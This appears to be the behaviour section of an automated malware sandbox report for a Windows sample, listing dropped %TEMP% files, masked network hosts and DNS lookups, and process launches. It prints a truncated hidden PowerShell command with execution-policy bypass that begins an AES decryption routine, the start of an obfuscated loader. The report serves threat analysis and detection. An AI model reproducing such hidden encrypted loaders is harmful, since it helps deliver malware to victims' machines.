Technical Information
- '%TEMP%\stompemout.bat.exe' -noprofile -windowstyle hidden -ep bypass -command function LBFOM($LVgan){ $hzKht=[System.Security.Cryptography.Aes]::Create(); $hzKht.Mode=[System.Security.Cryptography.CipherMode]::CBC; $hzKh...
- %TEMP%\sematary_dox.txt
- %TEMP%\stompemout.bat
- %TEMP%\stompemout.bat.exe
- 'fe##.lol':443
- 'pk#.goog':80
- 'wi##l.top':443
- 'di##ord.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'fe##.lol':443
- 'wi##l.top':443
- 'di##ord.com':443
- DNS ASK fe##.lol
- DNS ASK pk#.goog
- DNS ASK wi##l.top
- DNS ASK di##ord.com
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\stompemout.bat"' (with hidden window)
- '<SYSTEM32>\notepad.exe' %TEMP%\sematary_dox.txt
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\stompemout.bat"